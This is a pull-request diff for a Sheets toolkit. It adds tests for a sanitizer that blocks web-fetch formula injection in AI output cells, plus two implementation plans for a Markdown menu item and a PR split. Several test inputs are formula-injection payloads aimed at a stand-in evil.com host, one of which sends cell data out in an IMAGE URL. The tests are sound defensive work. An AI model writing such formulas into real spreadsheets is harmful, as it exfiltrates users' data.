### PR TITLE
fix(security): block web-fetch formula injection in AI output cells (T6)

### DIFF
--- a/__tests__/utils.test.ts
+++ b/__tests__/utils.test.ts
@@ -19,6 +19,7 @@ import {
   writeColumn,
   writeJobProgress,
   interpolateTemplate,
+  sanitizeForCell,
 } from "../src/server/utils";
 import type { DriveFileInfo } from "../src/server/types";
 
@@ -496,5 +497,80 @@ describe("interpolateTemplate", () => {
     );
 
     expect(interpolateTemplate("{{#x}}first{{/x}}{{#x}}second{{/x}}", { x: "" })).toBe("");
+  });
+});
+
+describe("sanitizeForCell", () => {
+  const REJECTION_MSG =
+    "[SSI Error: AI response contained an external request formula — output rejected]";
+
+  // Web-fetch blocking — these functions make outbound HTTP requests and can exfiltrate cell data
+  it("rejects =IMAGE formula (exfiltrates cell data via image URL)", () => {
+    expect(sanitizeForCell('=IMAGE("https://evil.com/?d="&A1)')).toBe(REJECTION_MSG);
+  });
+
+  it("rejects +IMPORTDATA formula (fetches external URL via + prefix)", () => {
+    expect(sanitizeForCell("+IMPORTDATA(A1)")).toBe(REJECTION_MSG);
+  });
+
+  it("rejects -IMPORTXML formula", () => {
+    expect(sanitizeForCell('-IMPORTXML(A1, "//b")')).toBe(REJECTION_MSG);
+  });
+
+  it("rejects =IMPORTHTML formula", () => {
+    expect(sanitizeForCell('=IMPORTHTML("http://evil.com", "table", 1)')).toBe(REJECTION_MSG);
+  });
+
+  it("rejects =IMPORTRANGE formula", () => {
+    expect(sanitizeForCell('=IMPORTRANGE("spreadsheetId", "A1:A10")')).toBe(REJECTION_MSG);
+  });
+
+  it("rejects =IMPORTFEED formula", () => {
+    expect(sanitizeForCell('=IMPORTFEED("http://evil.com/rss")')).toBe(REJECTION_MSG);
+  });
+
+  it("rejects web-fetch function nested inside another formula", () => {
+    expect(sanitizeForCell('=IF(1=1,IMAGE("evil.com"),0)')).toBe(REJECTION_MSG);
+  });
+
+  it("rejects web-fetch function nested inside IFERROR", () => {
+    expect(sanitizeForCell('=IFERROR(IMPORTDATA("http://evil.com"),0)')).toBe(REJECTION_MSG);
+  });
+
+  it("rejects web-fetch function name regardless of case", () => {
+    expect(sanitizeForCell('=image("evil.com")')).toBe(REJECTION_MSG);
+  });
+
+  // Safe formula prefix — non-web-fetch formulas get ' to prevent Sheets from evaluating them
+  it("prepends apostrophe to non-web-fetch formula starting with =", () => {
+    expect(sanitizeForCell("=SUM(A1:A10)")).toBe("'=SUM(A1:A10)");
+  });
+
+  it("prepends apostrophe to non-web-fetch formula starting with - (defense-in-depth)", () => {
+    expect(sanitizeForCell("-SUM(A1:A10)")).toBe("'-SUM(A1:A10)");
+  });
+
+  it("prepends apostrophe to non-web-fetch formula starting with +", () => {
+    expect(sanitizeForCell("+SUM(A1:A10)")).toBe("'+SUM(A1:A10)");
+  });
+
+  // Unchanged
+  it("leaves normal AI response text unchanged", () => {
+    expect(sanitizeForCell("The subject appeared in three court filings.")).toBe(
+      "The subject appeared in three court filings.",
+    );
+  });
+
+  it("leaves empty string unchanged", () => {
+    expect(sanitizeForCell("")).toBe("");
+  });
+
+  it("leaves values with leading whitespace unchanged (Sheets does not evaluate as formula)", () => {
+    expect(sanitizeForCell("  =not evaluated as formula")).toBe("  =not evaluated as formula");
+  });
+
+  it("preserves the full response when prepending apostrophe to a safe multiline formula", () => {
+    const input = "=SUM(A1:A10)\nNote: this formula sums the range";
+    expect(sanitizeForCell(input)).toBe(`'${input}`);
   });
 });

--- a/docs/superpowers/plans/2026-06-23-format-markdown.md
+++ b/docs/superpowers/plans/2026-06-23-format-markdown.md
@@ -1,0 +1,451 @@
+# Format Markdown Implementation Plan
+
+> **For agentic workers:** REQUIRED SUB-SKILL: Use superpowers:subagent-driven-development (recommended) or superpowers:executing-plans to implement this plan task-by-task. Steps use checkbox (`- [ ]`) syntax for tracking.
+
+**Goal:** Add a "📝 Format Markdown" SSI Toolkit menu item that converts markdown syntax in a user-selected cell range to Google Sheets rich text in-place.
+
+**Architecture:** Export the existing private `parseMarkdown()` from `rich-text.ts` and extend it + `TextRange` to support three new formatting features (strikethrough, inline code, multi-level heading sizes). A new `formatMarkdownSelection()` server function in `index.ts` reads the active selection, runs `parseMarkdown` + the existing `toCellValue` renderer (extended for the new fields), and writes `setRichTextValue()` back to each cell. Wired to the menu via `onOpen()` and a rollup footer stub — no sidebar panel required.
+
+**Tech Stack:** TypeScript, Google Apps Script (`SpreadsheetApp`), Rollup IIFE bundle, Jest + ts-jest
+
+## Global Constraints
+
+- Apps Script runtime is V8 — tsconfig targets ES2019; no Node built-ins at runtime
+- `src/server/rich-text.ts` must remain GAS-free (no `SpreadsheetApp` calls) for testability
+- `toCellValue` and all GAS-coupled code live in `src/server/index.ts`, which is excluded from unit-test coverage
+- Named exports only; no default exports
+- Run `npm test` after every task; run `npm run typecheck` before committing Task 2
+
+---
+
+## File Map
+
+| File | Role | Change |
+|---|---|---|
+| `src/server/rich-text.ts` | Pure markdown parser + CellContent model | Export `parseMarkdown`; add 3 fields to `TextRange`; extend `processInline` for `~~` and backtick; add `headingDepth` for font sizes |
+| `src/server/index.ts` | GAS entry point + renderer | Extend `toCellValue`; import + call `parseMarkdown`; add `formatMarkdownSelection()`; update `onOpen()` |
+| `rollup.config.js` | Footer stubs for GAS discovery | Add one stub for `formatMarkdownSelection` |
+| `__tests__/rich-text.test.ts` | Unit tests for the parser | Add 6 new tests; update 1 existing heading test that will break |
+
+---
+
+## Task 1: Extend `TextRange` + `parseMarkdown` — TDD
+
+**Files:**
+- Modify: `src/server/rich-text.ts`
+- Test: `__tests__/rich-text.test.ts`
+
+**Interfaces:**
+- Produces: `parseMarkdown(text: string): CellContent` (exported)
+- Produces: `TextRange` extended with `strikethrough?: boolean`, `fontFamily?: string`, `fontSize?: number`
+
+---
+
+- [ ] **Step 1: Add the import for `parseMarkdown` in the test file and write 6 failing tests**
+
+In `__tests__/rich-text.test.ts`, update the import block at the top of the file:
+
+```typescript
+import {
+  buildRichInferenceCellContent,
+  buildRichGroundingCellContent,
+  parseMarkdown,
+} from "../src/server/rich-text";
+```
+
+Then add a new `describe` block at the bottom of the file (after the `buildRichGroundingCellContent` block):
+
+```typescript
+// ============================================================
+// parseMarkdown — extended features
+// ============================================================
+
+describe("parseMarkdown — extended features", () => {
+  it("wraps ~~text~~ as a strikethrough range", () => {
+    const result = parseMarkdown("before ~~struck~~ after");
+    expect(result.text).toBe("before struck after");
+    expect(result.ranges).toContainEqual({ startIndex: 7, endIndex: 13, strikethrough: true });
+  });
+
+  it("wraps `code` as a Courier New font-family range", () => {
+    const result = parseMarkdown("run `npm test` now");
+    expect(result.text).toBe("run npm test now");
+    expect(result.ranges).toContainEqual({ startIndex: 4, endIndex: 12, fontFamily: "Courier New" });
+  });
+
+  it("applies fontSize 18 and bold to h1", () => {
+    const result = parseMarkdown("# Title");
+    expect(result.text).toBe("Title");
+    expect(result.ranges).toContainEqual({ startIndex: 0, endIndex: 5, bold: true, fontSize: 18 });
+  });
+
+  it("applies fontSize 16 and bold to h2", () => {
+    const result = parseMarkdown("## Section");
+    expect(result.text).toBe("Section");
+    expect(result.ranges).toContainEqual({ startIndex: 0, endIndex: 7, bold: true, fontSize: 16 });
+  });
+
+  it("applies fontSize 14 and bold to h3", () => {
+    const result = parseMarkdown("### Sub");
+    expect(result.text).toBe("Sub");
+    expect(result.ranges).toContainEqual({ startIndex: 0, endIndex: 3, bold: true, fontSize: 14 });
+  });
+
+  it("applies bold only (no fontSize) to h4 and deeper", () => {
+    const result = parseMarkdown("#### Deep");
+    expect(result.text).toBe("Deep");
+    const headingRange = result.ranges.find((r) => r.bold);
+    expect(headingRange).toBeDefined();
+    expect(headingRange?.fontSize).toBeUndefined();
+  });
+});
+```
+
+- [ ] **Step 2: Update the existing h2 test that will break**
+
+The existing test at line ~56 asserts the heading range has no `fontSize`. After our change h2 gains `fontSize: 16`. Update that assertion:
+
+Find this block in `__tests__/rich-text.test.ts`:
+```typescript
+it("strips ## heading prefix and produces a bold range", () => {
+  const result = buildRichInferenceCellContent(
+    makeResponse({ text: "## Section Title\nBody text." }),
+  );
+  expect(result.text).toBe("Section Title\nBody text.");
+  expect(result.ranges[0]).toEqual({ startIndex: 0, endIndex: 13, bold: true });
+});
+```
+
+Replace the final assertion with:
+```typescript
+  expect(result.ranges[0]).toEqual({ startIndex: 0, endIndex: 13, bold: true, fontSize: 16 });
+```
+
+- [ ] **Step 3: Run tests to confirm the 7 affected tests fail**
+
+```bash
+npx jest __tests__/rich-text.test.ts --no-coverage
+```
+
+Expected: 7 failures — the 6 new tests (`parseMarkdown` not exported yet / new features not implemented) plus the updated h2 test.
+
+- [ ] **Step 4: Export `parseMarkdown` and extend `TextRange` in `rich-text.ts`**
+
+In `src/server/rich-text.ts`, update the `TextRange` interface (around line 20):
+
+```typescript
+export interface TextRange {
+  startIndex: number;
+  endIndex: number;
+  bold?: boolean;
+  italic?: boolean;
+  strikethrough?: boolean;
+  fontFamily?: string;
+  fontSize?: number;
+  url?: string;
+}
+```
+
+Change `function processInline` to `export function processInline` — no, keep `processInline` private. Instead, change `function parseMarkdown` to `export function parseMarkdown`.
+
+- [ ] **Step 5: Add `~~strikethrough~~` and `` `code` `` patterns to `processInline`**
+
+In `processInline`, add two new blocks immediately before the `// Plain character` fallback (after the `*italic*` block):
+
+```typescript
+// ~~strikethrough~~ — must check before plain ~ fallback
+if (segment[i] === "~" && segment[i + 1] === "~") {
+  const closeIdx = segment.indexOf("~~", i + 2);
+  if (closeIdx > i + 1) {
+    const spanStart = cleanLen;
+    const inner = segment.slice(i + 2, closeIdx);
+    parts.push(inner);
+    cleanLen += inner.length;
+    ranges.push({ startIndex: spanStart, endIndex: cleanLen, strikethrough: true });
+    i = closeIdx + 2;
+    continue;
+  }
+}
+
+// `inline code` — single-backtick span
+if (segment[i] === "`") {
+  const closeIdx = segment.indexOf("`", i + 1);
+  if (closeIdx > i) {
+    const spanStart = cleanLen;
+    const inner = segment.slice(i + 1, closeIdx);
+    parts.push(inner);
+    cleanLen += inner.length;
+    ranges.push({ startIndex: spanStart, endIndex: cleanLen, fontFamily: "Courier New" });
+    i = closeIdx + 1;
+    continue;
+  }
+}
+```
+
+- [ ] **Step 6: Add `headingDepth` tracking and `fontSize` to the heading range in `parseMarkdown`**
+
+In `parseMarkdown`, update the variable declarations at the top of the `for` loop body:
+
+```typescript
+let content = line;
+let isHeading = false;
+let headingDepth = 0;
+```
+
+Update the heading detection block:
+
+```typescript
+const headingMatch = line.match(/^(#{1,6}) /);
+if (headingMatch) {
+  content = line.slice(headingMatch[1].length + 1);
+  isHeading = true;
+  headingDepth = headingMatch[1].length;
+}
+```
+
+Update the `isHeading` range push at the bottom of the loop:
+
+```typescript
+if (isHeading) {
+  const fontSize = headingDepth === 1 ? 18 : headingDepth === 2 ? 16 : headingDepth === 3 ? 14 : undefined;
+  const range: TextRange = { startIndex: spanStart, endIndex: cleanLen, bold: true };
+  if (fontSize !== undefined) range.fontSize = fontSize;
+  ranges.push(range);
+}
+```
+
+- [ ] **Step 7: Run tests to confirm all 7 pass**
+
+```bash
+npx jest __tests__/rich-text.test.ts --no-coverage
+```
+
+Expected: all tests pass, including the 6 new ones and the updated h2 test.
+
+- [ ] **Step 8: Run the full test suite**
+
+```bash
+npm test
+```
+
+Expected: all 490+ tests pass.
+
+- [ ] **Step 9: Commit**
+
+```bash
+git add src/server/rich-text.ts __tests__/rich-text.test.ts
+git commit -m "feat: extend TextRange + parseMarkdown for strikethrough, inline code, and heading font sizes"
+```
+
+---
+
+## Task 2: Wire up `formatMarkdownSelection`, `toCellValue`, menu, and rollup stub
+
+No unit tests for this task — all code is GAS-coupled (`SpreadsheetApp`). Verification is via build.
+
+**Files:**
+- Modify: `src/server/index.ts`
+- Modify: `rollup.config.js`
+
+**Interfaces:**
+- Consumes: `parseMarkdown(text: string): CellContent` from `./rich-text` (exported in Task 1)
+- Consumes: `TextRange` with `strikethrough`, `fontFamily`, `fontSize` (Task 1)
+- Produces: `formatMarkdownSelection(): void` (exported, GAS menu entry point)
+
+---
+
+- [ ] **Step 1: Add `parseMarkdown` to the `rich-text` import in `index.ts`**
+
+Find the existing import block in `src/server/index.ts`:
+
+```typescript
+import {
+  buildRichInferenceCellContent,
+  buildRichGroundingCellContent,
+  type CellContent,
+} from "./rich-text";
+```
+
+Replace with:
+
+```typescript
+import {
+  buildRichInferenceCellContent,
+  buildRichGroundingCellContent,
+  parseMarkdown,
+  type CellContent,
+} from "./rich-text";
+```
+
+- [ ] **Step 2: Extend `toCellValue` to handle the three new `TextRange` fields**
+
+Find the existing `toCellValue` function in `src/server/index.ts` (around line 245):
+
+```typescript
+function toCellValue(content: CellContent): GoogleAppsScript.Spreadsheet.RichTextValue {
+  const builder = SpreadsheetApp.newRichTextValue().setText(content.text);
+  content.ranges.forEach(({ startIndex, endIndex, bold, italic, url }) => {
+    if (bold === true || italic === true) {
+      const style = SpreadsheetApp.newTextStyle();
+      if (bold === true) style.setBold(true);
+      if (italic === true) style.setItalic(true);
+      builder.setTextStyle(startIndex, endIndex, style.build());
+    }
+    if (url) builder.setLinkUrl(startIndex, endIndex, url);
+  });
+  return builder.build();
+}
+```
+
+Replace with:
+
+```typescript
+function toCellValue(content: CellContent): GoogleAppsScript.Spreadsheet.RichTextValue {
+  const builder = SpreadsheetApp.newRichTextValue().setText(content.text);
+  content.ranges.forEach(({ startIndex, endIndex, bold, italic, strikethrough, fontFamily, fontSize, url }) => {
+    if (bold || italic || strikethrough || fontFamily || fontSize) {
+      const style = SpreadsheetApp.newTextStyle();
+      if (bold)          style.setBold(true);
+      if (italic)        style.setItalic(true);
+      if (strikethrough) style.setStrikethrough(true);
+      if (fontFamily)    style.setFontFamily(fontFamily);
+      if (fontSize)      style.setFontSize(fontSize);
+      builder.setTextStyle(startIndex, endIndex, style.build());
+    }
+    if (url) builder.setLinkUrl(startIndex, endIndex, url);
+  });
+  return builder.build();
+}
+```
+
+- [ ] **Step 3: Add `formatMarkdownSelection()` to `index.ts`**
+
+Add the new function immediately after `toCellValue` (before `const FILE_PIPELINE_BATCH_SIZE`):
+
+```typescript
+export function formatMarkdownSelection(): void {
+  const ui = SpreadsheetApp.getUi();
+  const range = SpreadsheetApp.getActiveRange();
+  if (!range) {
+    ui.alert("Select one or more cells first.");
+    return;
+  }
+  try {
+    const values = range.getValues() as unknown[][];
+    let count = 0;
+    for (let r = 0; r < values.length; r++) {
+      for (let c = 0; c < values[r].length; c++) {
+        const value = values[r][c];
+        if (typeof value !== "string" || value.trim() === "") continue;
+        const cell = range.getCell(r + 1, c + 1);
+        try {
+          cell.setRichTextValue(toCellValue(parseMarkdown(value)));
+          count++;
+        } catch (_e) {
+          cell.setValue(parseMarkdown(value).text);
+        }
+      }
+    }
+    ui.alert(`Formatted ${count} cell(s).`);
+  } catch (e) {
+    ui.alert(`Error: ${(e as Error).message}`);
+  }
+}
+```
+
+- [ ] **Step 4: Add the menu item to `onOpen()`**
+
+Find `onOpen` in `src/server/index.ts`:
+
+```typescript
+export function onOpen(): void {
+  SpreadsheetApp.getUi()
+    .createMenu("📐 SSI Toolkit")
+    .addItem("📐 Open SSI Toolkit", "showSidebar")
+    .addToUi();
+}
+```
+
+Replace with:
+
+```typescript
+export function onOpen(): void {
+  SpreadsheetApp.getUi()
+    .createMenu("📐 SSI Toolkit")
+    .addItem("📐 Open SSI Toolkit", "showSidebar")
+    .addItem("📝 Format Markdown", "formatMarkdownSelection")
+    .addToUi();
+}
+```
+
+- [ ] **Step 5: Add the rollup footer stub**
+
+In `rollup.config.js`, add one line to the `footer` string immediately after the `function showSidebar()` stub (around line 80):
+
+```js
+function formatMarkdownSelection() { _GASEntry.formatMarkdownSelection(); }
+```
+
+The footer block should now read:
+
+```js
+function onOpen(e) { _GASEntry.onOpen(e); }
+function showSidebar() { _GASEntry.showSidebar(); }
+function formatMarkdownSelection() { _GASEntry.formatMarkdownSelection(); }
+function runTool(fn, jobId) { _GASEntry.runTool(fn, jobId); }
+// ... rest unchanged
+```
+
+- [ ] **Step 6: Update the menu test that will break**
+
+In `__tests__/menu.test.ts`, find the test at line ~85 that asserts `addItem` is called exactly once:
+
+```typescript
+it("adds a single item that opens the sidebar", () => {
+  onOpen();
+  expect(mockAddItem).toHaveBeenCalledTimes(1);
+  expect(mockAddItem).toHaveBeenCalledWith("📐 Open SSI Toolkit", "showSidebar");
+});
+```
+
+Replace with:
+
+```typescript
+it("adds menu items for Open Toolkit and Format Markdown", () => {
+  onOpen();
+  expect(mockAddItem).toHaveBeenCalledTimes(2);
+  expect(mockAddItem).toHaveBeenCalledWith("📐 Open SSI Toolkit", "showSidebar");
+  expect(mockAddItem).toHaveBeenCalledWith("📝 Format Markdown", "formatMarkdownSelection");
+});
+```
+
+Run to confirm the test now passes:
+
+```bash
+npx jest __tests__/menu.test.ts --no-coverage
+```
+
+Expected: all menu tests pass.
+
+- [ ] **Step 7: Run typecheck and build to verify no errors**
+
+```bash
+npm run typecheck && npm run build
+```
+
+Expected: clean typecheck output and `dist/` files generated with no errors.
+
+- [ ] **Step 8: Run the full test suite one final time**
+
+```bash
+npm test
+```
+
+Expected: all tests pass.
+
+- [ ] **Step 9: Commit**
+
+```bash
+git add src/server/index.ts rollup.config.js __tests__/menu.test.ts
+git commit -m "feat: add Format Markdown menu item (formatMarkdownSelection)"
+```

--- a/docs/superpowers/plans/2026-06-24-threat-model-pr-split.md
+++ b/docs/superpowers/plans/2026-06-24-threat-model-pr-split.md
@@ -1,0 +1,329 @@
+# Threat Model PR Split Implementation Plan
+
+> **For agentic workers:** REQUIRED SUB-SKILL: Use superpowers:subagent-driven-development (recommended) or superpowers:executing-plans to implement this plan task-by-task. Steps use checkbox (`- [ ]`) syntax for tracking.
+
+**Goal:** Rebase PR #112 onto `develop` as a standalone security fix (code only, no threat model change), and update PR #110 to own the T6-Resolved entry with a new PR link column.
+
+**Architecture:** Two independent git tasks on two separate branches. Task 1 rewrites the AI-56 branch history (force-push). Task 2 adds a commit to AI-8. Neither touches the other's branch. Do Task 1 first so the #112 URL exists when Task 2 references it.
+
+**Tech Stack:** git, curl + Python (GitHub REST API for PR description updates)
+
+## Global Constraints
+
+- GitHub API calls: use `-H "Authorization: Bearer $GH_TOKEN"` explicitly; write JSON payload to `$TMPDIR` file first, pass with `-d @file`
+- Force-push only to `AI-56-address-ai-generated-import-sheets-functions` (solo feature branch, no collaborators)
+- All commits must follow the existing message style (conventional commits: `fix:`, `docs:`)
+- Run `npm test` after Task 1 to verify the rebased commit doesn't break tests
+
+---
+
+## Files Changed
+
+**Task 1 — PR #112 rebase:**
+- Rewrite: `AI-56-address-ai-generated-import-sheets-functions` branch history
+
+**Task 2 — PR #110 threat model update:**
+- Modify: `docs/threat_models/ssi-toolkit-threat-model.md` (on `AI-8-initial-threat-model` branch)
+
+---
+
+## Task 1: Rebase PR #112 onto develop (code-only)
+
+**Goal:** Replace the current AI-56 branch (which branches from AI-8's first commit `cadcf0b`) with a single commit on top of `develop` containing only the three code files — `utils.ts`, `index.ts`, `__tests__/utils.test.ts`. No threat model changes.
+
+**Files:**
+- Rewrite branch: `AI-56-address-ai-generated-import-sheets-functions`
+- Code files brought in: `src/server/utils.ts`, `src/server/index.ts`, `__tests__/utils.test.ts`
+
+- [ ] **Step 1: Confirm current branch and clean state**
+
+```bash
+git status
+git branch --show-current
+```
+
+Expected: clean working tree, on `develop`.
+
+- [ ] **Step 2: Create a scratch branch from develop**
+
+```bash
+git checkout develop
+git checkout -b AI-56-standalone-scratch
+```
+
+Expected: new branch `AI-56-standalone-scratch` at same HEAD as `develop`.
+
+- [ ] **Step 3: Bring in the three code files from AI-56**
+
+```bash
+git checkout origin/AI-56-address-ai-generated-import-sheets-functions -- \
+  src/server/utils.ts \
+  src/server/index.ts \
+  __tests__/utils.test.ts
+```
+
+Expected: three files staged, no other changes. Verify:
+
+```bash
+git diff --cached --name-only
+```
+
+Expected output (exactly these three lines, no others):
+```
+__tests__/utils.test.ts
+src/server/index.ts
+src/server/utils.ts
+```
+
+- [ ] **Step 4: Verify the diff looks correct**
+
+```bash
+git diff --cached src/server/utils.ts | grep "^+" | grep -i "sanitize"
+```
+
+Expected: lines showing `sanitizeForCell` function being added.
+
+```bash
+git diff --cached src/server/index.ts | grep "^+" | grep -i "sanitize"
+```
+
+Expected: lines showing `sanitizeForCell` being called in the wiring.
+
+- [ ] **Step 5: Run tests**
+
+```bash
+npm test
+```
+
+Expected: all 490 tests pass (the sanitizeForCell tests are included in `__tests__/utils.test.ts` which is now staged).
+
+- [ ] **Step 6: Commit with the original message**
+
+```bash
+git commit -m "fix(security): block web-fetch formula injection in AI output cells (T6)"
+```
+
+- [ ] **Step 7: Verify the branch has exactly one commit beyond develop**
+
+```bash
+git log --oneline develop..HEAD
+```
+
+Expected: exactly one line — the commit just made.
+
+- [ ] **Step 8: Force-push to the AI-56 remote branch**
+
+```bash
+git push origin AI-56-standalone-scratch:AI-56-address-ai-generated-import-sheets-functions --force
+```
+
+Expected: `Branch 'AI-56-address-ai-generated-import-sheets-functions' set up to track remote branch...` or similar success output.
+
+- [ ] **Step 9: Delete the scratch branch and return to develop**
+
+```bash
+git checkout develop
+git branch -d AI-56-standalone-scratch
+```
+
+- [ ] **Step 10: Update PR #112 description**
+
+Write the payload to a temp file and PATCH via GitHub API.
+
+The new body removes two items from the current Summary: the "Marks T6 as Resolved" bullet and the "Merge order" note. All other sections remain unchanged.
+
+```bash
+python3 -c "
+import json, os
+body = '''## Summary
+
+- Implements \`sanitizeForCell()\` in \`src/server/utils.ts\` — scans AI-generated text for Sheets web-fetch functions (IMAGE, IMPORTDATA, IMPORTXML, IMPORTHTML, IMPORTRANGE, IMPORTFEED) anywhere in the formula body, including nested positions like \`=IF(1=1,IMAGE(...),0)\`, and replaces them with an explicit error string rather than writing to the sheet
+- Other formula-prefixed values (\`=\`, \`+\`, \`-\`) that don\'t contain web-fetch functions get a \`\'\` prefix so Sheets renders them as literals
+- Wires \`sanitizeForCell()\` into both \`setValue()\` call sites on the AI output column in \`index.ts\`
+
+## Manual QA
+
+> N/A — targets \`develop\`; behaviour only changes when AI returns a value starting with \`=\`, \`+\`, or \`-\`
+
+## Security
+
+- [x] Modifies how AI output is written to the spreadsheet (affects T6 — formula injection)
+
+## Notes
+
+<!-- Anything reviewers or QA testers should know -->'''
+payload = json.dumps({'body': body})
+path = os.path.join(os.environ['TMPDIR'], 'pr112_body.json')
+open(path, 'w').write(payload)
+print(path)
+"
+```
+
+Note the path printed, then:
+
+```bash
+curl -s -X PATCH \
+  -H "Accept: application/vnd.github.v3+json" \
+  -H "Authorization: Bearer $GH_TOKEN" \
+  -H "Content-Type: application/json" \
+  https://api.github.com/repos/propublica/gas-ssi-toolkit/pulls/112 \
+  -d @"$TMPDIR/pr112_body.json" \
+  | python3 -c "import sys,json; d=json.load(sys.stdin); print(d.get('html_url') or d)"
+```
+
+Expected: prints `https://github.com/propublica/gas-ssi-toolkit/pull/112`
+
+- [ ] **Step 11: Confirm PR #112 on GitHub**
+
+Open `https://github.com/propublica/gas-ssi-toolkit/pull/112` and verify:
+- Branch now shows 1 commit (the fix commit) on top of `develop`
+- Description has no "Merge order" note
+- Description has no "Marks T6 as Resolved" bullet
+- CI passes (lint, typecheck, tests)
+
+---
+
+## Task 2: Update PR #110 — threat model T6 row + PR column
+
+**Goal:** On the `AI-8-initial-threat-model` branch, add a new commit that (1) adds a `PR` column to the Open Items table, and (2) marks T6 as Resolved with both the Linear issue link and the #112 PR link.
+
+**Files:**
+- Modify: `docs/threat_models/ssi-toolkit-threat-model.md` (on `AI-8-initial-threat-model` branch)
+
+- [ ] **Step 1: Checkout the AI-8 branch**
+
+```bash
+git checkout AI-8-initial-threat-model
+```
+
+If the local branch doesn't exist yet:
+
+```bash
+git checkout -b AI-8-initial-threat-model origin/AI-8-initial-threat-model
+```
+
+Expected: on branch `AI-8-initial-threat-model`, clean working tree.
+
+- [ ] **Step 2: Edit the Open Items table in the threat model**
+
+File: `docs/threat_models/ssi-toolkit-threat-model.md`
+
+Replace the entire Open Items table. The current table (to find it, search for `### Open Items`) looks like this:
+
+**Current table header and T6 row (old_string for Edit tool):**
+```
+| Priority | Status | Linear | Item | Description |
+| --- | --- | --- | --- | --- |
+| High | Open | — | Fix T6 — formula injection | Implement `sanitizeForCell()` in `src/server/utils.ts`: reject web-fetch formulas (anywhere in formula body, including nested) with an error string; prefix other formula-triggered values with `'`; wire into all `setValue()` calls on the AI output column in `index.ts` (R8) |
+| Medium | Open | — | Branch protection audit | Confirm required-review rules are active on `main` and `develop` (R5) |
+| Medium | Open | — | Access audit | Review and document who has Apps Script project editor access (R1) |
+| Medium | Open | — | Stackdriver log audit | Review exception handling in `index.ts` to confirm no cell values or file names reach Stackdriver logs (R14) |
+| Medium | Open | — | Add `npm audit` to CI | Fail CI on high/critical npm vulnerabilities (R12) |
+| Medium | Open | — | Fix T15 — OCR temp doc cleanup | Wrap deletion in `finally`, alert user on cleanup failure, prefix temp doc names with `[SSI-TEMP]` (R19) |
+| Low | Open | — | 2FA verification | Confirm 2FA is enforced on all accounts with deploy access (R9) |
+| Medium | Open | — | T11 sidebar warning — specify both url_context vectors | Update the `url_context` warning copy to explicitly state that URLs already in dataset cells will be fetched, and that attacker-controlled URLs can inject instructions via their response (R13) |
+| Low | Open | — | Post-MVP: pre-inference URL scan | Before a `url_context` run, scan prompt column cells for URLs and surface an alert listing them so the user can confirm before proceeding (R13, deferred) |
+| Low | Open | — | User-facing data notice | Write guidance for journalists covering data sent to Gemini, prompt injection risk, and `url_context` egress (R3, R11, R13) |
+| Low | Open | — | GCP budget alerts and quota caps | Configure spend alerts and per-key daily quotas in Google Cloud Console (R16, R17) |
+```
+
+**Replace with (new_string for Edit tool):**
+```
+| Priority | Status | Linear | PR | Item | Description |
+| --- | --- | --- | --- | --- | --- |
+| High | Resolved | [AI-56](https://linear.app/propublica/issue/AI-56/address-ai-generated-import-sheets-functions) | [#112](https://github.com/propublica/gas-ssi-toolkit/pull/112) | Fix T6 — formula injection | `sanitizeForCell()` in `src/server/utils.ts`: rejects web-fetch formulas (anywhere in formula body, including nested) with an error string; prefixes other formula-triggered values with `'`; wired into all `setValue()` calls on the AI output column in `index.ts` (R8) |
+| Medium | Open | — | — | Branch protection audit | Confirm required-review rules are active on `main` and `develop` (R5) |
+| Medium | Open | — | — | Access audit | Review and document who has Apps Script project editor access (R1) |
+| Medium | Open | — | — | Stackdriver log audit | Review exception handling in `index.ts` to confirm no cell values or file names reach Stackdriver logs (R14) |
+| Medium | Open | — | — | Add `npm audit` to CI | Fail CI on high/critical npm vulnerabilities (R12) |
+| Medium | Open | — | — | Fix T15 — OCR temp doc cleanup | Wrap deletion in `finally`, alert user on cleanup failure, prefix temp doc names with `[SSI-TEMP]` (R19) |
+| Low | Open | — | — | 2FA verification | Confirm 2FA is enforced on all accounts with deploy access (R9) |
+| Medium | Open | — | — | T11 sidebar warning — specify both url_context vectors | Update the `url_context` warning copy to explicitly state that URLs already in dataset cells will be fetched, and that attacker-controlled URLs can inject instructions via their response (R13) |
+| Low | Open | — | — | Post-MVP: pre-inference URL scan | Before a `url_context` run, scan prompt column cells for URLs and surface an alert listing them so the user can confirm before proceeding (R13, deferred) |
+| Low | Open | — | — | User-facing data notice | Write guidance for journalists covering data sent to Gemini, prompt injection risk, and `url_context` egress (R3, R11, R13) |
+| Low | Open | — | — | GCP budget alerts and quota caps | Configure spend alerts and per-key daily quotas in Google Cloud Console (R16, R17) |
+```
+
+- [ ] **Step 3: Verify the edit**
+
+```bash
+git diff docs/threat_models/ssi-toolkit-threat-model.md | grep "^[+-]" | grep -v "^---\|^+++"
+```
+
+Expected changes:
+- Header row gains `| PR |` column
+- T6 row: `Open` → `Resolved`, `—` → Linear link, new `[#112](...)` cell, description tense changes (Implement → rejects/prefixes/wired)
+- All other rows gain a `| — |` cell after the Linear column
+- No other lines changed
+
+- [ ] **Step 4: Commit**
+
+```bash
+git add docs/threat_models/ssi-toolkit-threat-model.md
+git commit -m "docs(security): mark T6 resolved, add PR column to open items table"
+```
+
+- [ ] **Step 5: Push the new commit to origin**
+
+```bash
+git push origin AI-8-initial-threat-model
+```
+
+Expected: fast-forward push success (not a force-push — just adding a commit).
+
+- [ ] **Step 6: Update PR #110 description**
+
+```bash
+python3 -c "
+import json, os
+body = '''## Summary
+
+- Introduces the SSI Toolkit threat model at \`docs/threat_models/ssi-toolkit-threat-model.md\` — 15 threats (T1–T15), 19 responses (R1–R19), and an open items tracker using the Mozilla 4-question framework
+- Adds two Mermaid architecture diagrams (runtime data flows + CI/CD pipeline) with trust boundary zones to make attack surfaces visible
+- Adds a Security section to the PR template prompting contributors to identify affected threats before opening a PR
+- Updates CLAUDE.md with security review guidance and an accurate description of the formula injection guard (T6) that all AI output writes must pass through
+- Adds a threat modeling skill at \`docs/superpowers/skills/application-threat-modeling.md\` documenting the diagram-first, 4-question process for future sessions
+- Marks T6 (formula injection) as Resolved in the open items table, with links to the Linear issue ([AI-56](https://linear.app/propublica/issue/AI-56/address-ai-generated-import-sheets-functions)) and the fix PR ([#112](https://github.com/propublica/gas-ssi-toolkit/pull/112)); adds a PR column to the table for future fix references
+
+## Manual QA
+
+> N/A — targets \`develop\`, no runtime behavior changes
+
+## Security
+
+- [x] None of the above — no threat model update needed (this PR *is* the threat model)
+
+## Notes
+
+<!-- Anything reviewers or QA testers should know -->'''
+payload = json.dumps({'body': body})
+path = os.path.join(os.environ['TMPDIR'], 'pr110_body.json')
+open(path, 'w').write(payload)
+print(path)
+"
+```
+
+```bash
+curl -s -X PATCH \
+  -H "Accept: application/vnd.github.v3+json" \
